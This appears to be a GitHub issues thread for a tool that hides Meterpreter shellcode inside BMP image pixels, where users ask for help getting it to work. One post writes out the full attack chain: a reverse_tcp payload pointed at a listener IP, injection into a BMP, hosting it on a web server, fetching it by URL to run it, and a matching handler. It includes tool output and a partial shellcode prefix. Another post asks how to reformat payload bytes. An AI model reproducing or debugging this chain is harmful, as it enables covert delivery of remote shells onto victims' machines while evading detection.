damonmohammadbagher / nativepayload_image
Transferring Backdoor Payloads with BMP Image Pixels
Hi, thank you for sharing such stuff.
Can I edit the source code to accept Injecting Meterpreter Payload size?
I get an error when I try to inject payload size=5855 bytes: Segmentation fault!
Thank you very much.
" step1 : msfconsole
step2 : msf > use payload/windows/x64/meterpreter/reverse_tcp
step3 : set lhost 192.168.1.104
step4 : generate
finally you can use stage1 "
then
NativePayload_Image.exe create “test3.bmp” [payload bytes omitted]
[!] Making New Bitmap File ...
[!] Bitmap File Name : test3.bmp
[+] Creating Header for Bitmap File ...
[>] Header adding (length 54) : 424d5e0e00000000000036000000280000........
[+] Injecting Meterpreter Payload to Bitmap File ...
[>] Injecting Payload (length 449) : fc4883e4f0e8cc00000041514150525156........
[+] Adding Ex-Payload for Bitmap File ...
[>] Ex-Payload adding (length FF * 3114).
[!] File test3.bmp with length 4621 bytes Created.
then
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.104
exploit
then
cp test3.bmp /var/www/html/
Then I download and open the file from another computer (Windows x64 architecture) on the local network, and no session appears...
or...
When I want to publish as URL:
./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 510 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017
Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 510 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception:
System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
[ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
Could you help me please?
Hello, thanks for sharing this great knowledge. I want to ask if there is a way to automate the removal of 0x in the generated payload, like below:
"0xfc , 0x48 , 0x83" to fc,48,83
Thanks